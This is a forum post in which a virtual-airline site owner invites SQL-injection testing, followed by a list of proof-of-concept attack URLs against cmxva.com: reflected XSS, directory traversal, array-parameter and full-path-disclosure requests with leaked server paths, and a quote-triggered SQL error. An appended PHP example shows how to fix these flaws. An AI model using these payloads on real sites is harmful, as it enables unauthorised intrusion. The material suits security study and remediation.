
Vista Security!


Crew-Portal


Why did I call this post Vista Security? Check my website and find out! Can someone use SQL injection and try to register themselves using SQL injection? But please don't register the other way; I really don't want anyone signed up unless they are working for this airline! Thanks in advance and ya... have fun. Also, if you do use SQL, please don't drop any of my databases! Please!  :'(


Array:

http://www.cmxva.com/index.php?page=flights&p[]

 

Array:

http://www.cmxva.com/index.php?page[]

 

Array:

http://www.cmxva.com/index.php?page=profile&call[]

 

Cross Site Scripting:

http://www.cmxva.com/index.php?page=<marquee>vulnerable</marquee>

 

Cross Site Scripting:

http://www.cmxva.com/index.php?page=flights&p="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.cmxva.com/index.php?page=profile&call=<marquee><h1>vulnerable</marquee>

 

Directory Traversal:

http://www.cmxva.com/?page=../index

 

Full Path Disclosure:

http://www.cmxva.com/?page=../../

Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(pages/../../.php) is not within the allowed path(s): (/home/cmxvaco/:/usr/lib/php:/usr/local/lib/php:/tmp) in /home/cmxvaco/public_html/index.php on line 149

 

Full Path Disclosure:

http://www.cmxva.com/?page=../forums/index

Warning: include(./extension.inc) [function.include]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/forums/index.php on line 25

 

Warning: include() [function.include]: Failed opening './extension.inc' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/forums/index.php on line 25

 

Warning: include(./common.) [function.include]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/forums/index.php on line 26

 

Warning: include() [function.include]: Failed opening './common.' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/forums/index.php on line 26

 

Fatal error: Call to undefined function session_pagestart() in /home/cmxvaco/public_html/forums/index.php on line 31

 

Full Path Disclosure:

http://www.cmxva.com/index.php?page=flights&s[]

Warning: Illegal offset type in /home/cmxvaco/public_html/pages/flights.php on line 86

 

Full Path Disclosure:

http://www.cmxva.com/?page=FsPgetflight

Warning: require(FsPadmin/setting.php) [function.require]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/FsPgetflight.php on line 4

 

Fatal error: require() [function.require]: Failed opening required 'FsPadmin/setting.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/FsPgetflight.php on line 4

 

Full Path Disclosure:

http://www.cmxva.com/pages/account.php

Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/account.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/account.php on line 2

 

Warning: Cannot modify header information - headers already sent by (output started at /home/cmxvaco/public_html/pages/account.php:2) in /home/cmxvaco/public_html/pages/account.php on line 7

 

Full Path Disclosure:

http://www.cmxva.com/pages/aircraft.php

Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/aircraft.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/aircraft.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/fleet.php

Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/fleet.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/fleet.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/FsPgetflight.php

Warning: require(FsPadmin/setting.php) [function.require]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/FsPgetflight.php on line 4

 

Fatal error: require() [function.require]: Failed opening required 'FsPadmin/setting.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/FsPgetflight.php on line 4

 

Full Path Disclosure:

http://www.cmxva.com/pages/lost.php

Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/lost.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/lost.php on line 2

 

Warning: Cannot modify header information - headers already sent by (output started at /home/cmxvaco/public_html/pages/lost.php:2) in /home/cmxvaco/public_html/pages/lost.php on line 7

 

Full Path Disclosure:

http://www.cmxva.com/pages/loa.php

Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/loa.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/loa.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/members.php

Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/members.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/members.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/postflight.php

Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/postflight.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/postflight.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/remove.php

Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/remove.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/remove.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/training.php

Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/training.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/training.php on line 2

 

Includes Directory:

http://www.cmxva.com/pages/

 

Maximum Length:

If you edit the input boxes when you register you can remove the maximum lengths.

 

SQL Error:

http://www.cmxva.com/index.php?page=profile&call='

A fatal MySQL error occured.

Query: SELECT * FROM flights WHERE PilotName = 'CMX-\'' ORDER BY FlightDate LIMIT 0,50

Error: (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

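An added example, not part of the thread and not the site's own code: one way the front controller could close the classes of finding listed above (array parameters, the `page` include, reflected markup, the unbounded input length and the `call` query). The allowlist, file layout and helper names are assumptions, and an in-memory SQLite database stands in for the site's MySQL server so the block runs offline with the pdo_sqlite extension.

```php
<?php
declare(strict_types=1);
ini_set('display_errors', '0');   // keep warnings (and server paths) out of responses
ini_set('log_errors', '1');       // send them to the error log instead

// Assumed allowlist: page names come from the URLs in the thread, the file layout is a guess.
const PAGES = ['flights' => 'pages/flights.php', 'profile' => 'pages/profile.php'];

// Return a string parameter, or null if it is missing, an array (p[]), or too long.
// The length is enforced server-side because the form's maxlength can be edited away.
function param(array $query, string $name, int $maxLen = 32): ?string
{
    $v = $query[$name] ?? null;
    return (is_string($v) && strlen($v) <= $maxLen) ? $v : null;
}

// Map ?page= onto a fixed path; user input is only ever used as an array key.
function resolvePage(array $query): string
{
    $page = param($query, 'page') ?? '';
    return PAGES[$page] ?? 'pages/notfound.php';
}

// Encode for HTML body and attribute context before echoing a parameter back.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Bound parameter instead of string concatenation; table and columns as in the error message.
function flightsFor(PDO $db, string $call): array
{
    $st = $db->prepare('SELECT * FROM flights WHERE PilotName = ? ORDER BY FlightDate LIMIT 50');
    $st->execute(['CMX-' . $call]);
    return $st->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed requests mirroring the ones reported above.
$db = new PDO('sqlite::memory:');   // stand-in for the site's MySQL database
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE flights (PilotName TEXT, FlightDate TEXT)');
foreach ([['page' => 'flights', 'p' => ['']], ['page' => ['']], ['page' => '../index'],
          ['page' => 'profile', 'call' => "'"],
          ['page' => 'profile', 'call' => '<marquee>vulnerable</marquee>']] as $q) {
    $call = param($q, 'call');
    $rows = $call === null ? 0 : count(flightsFor($db, $call));
    printf("%-20s call=%s rows=%d\n", resolvePage($q), h($call ?? '(none)'), $rows);
}
```

The files under pages/ also answered direct requests in the report; keeping them outside the web root, or having each one exit unless a constant defined by index.php is set, stops that.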
